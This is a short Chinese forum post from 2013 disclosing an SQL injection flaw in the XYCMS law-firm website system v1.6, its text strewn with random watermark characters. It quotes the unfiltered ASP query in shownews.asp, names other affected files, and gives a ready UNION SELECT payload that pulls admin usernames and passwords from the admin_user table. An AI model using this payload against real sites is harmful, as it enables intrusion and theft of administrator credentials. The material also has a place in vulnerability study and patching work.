前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
# V+ b. _3 A, ^ Z; g/ n' v ; J& F% W; e9 ^, s4 ^, g' J$ ]
淫荡分割线
# H* J, e* q8 w* m% v, Z+ F8 y--------------------------------------------------------
6 x9 M( d9 [- A6 B. {5 G
# M, Z) S0 \" F& ^3 y/ f. }, ^审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)- r3 Q8 k, ], y d
源码地址:http://down.chinaz.com/soft/29233.htm
) I# W0 @4 ~& E* b$ s8 Q ! q- x4 L& \5 \7 C- f
漏洞文件:shownews.asp; }2 O7 y0 j& J$ U
漏洞代码:7-13行
) V0 u( E8 m7 h, O7 a 6 Y5 I8 E; W& b. W- s* ]% C
! v$ G: K, ^- j<%
4 C% m7 p1 c, a1 g6 _8 qid=request.QueryString("id")/ S4 h# Z2 }" S0 @
* i7 k# D+ ~% Q: W- T' q: }set snews=server.createobject("adodb.recordset") / e2 k* J% L/ Z' W/ e) e! f& S
exec="select * from [news] where id="&id
2 S9 x. C6 }7 ]7 q' j- ]* \/ jsnews.open exec,conn,1,1
! x0 d. N5 b. c* H) W# j q%>
# X8 {9 g' \& {: D Y
) \- A; l6 L6 L/ x, f
- H, V$ a3 Z5 B3 Z7 W什么过滤都没有 直造成注入
: [3 w4 C5 P. _4 w3 j 6 H2 U, g* _! s9 c8 y; W+ M% i
注入点:http://127.0.0.1:99/shownews.asp?id=xx' v/ \; s H1 h" @0 A& Q
: R8 Z% Y5 l# J2 C; v" z
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找7 f2 P% f& n7 e/ m/ H! y
& D+ n, T8 S2 p* j" A
. J2 f7 X, \" b6 \exp: union select 1,admin,password,4,5,7 from admin_user
3 [0 ~" {) R a$ r% `' ]4 q, A1 U
9 @. K- D/ @5 O& \! } |
发表于 2013-4-4 17:28:12
收藏
支持
反对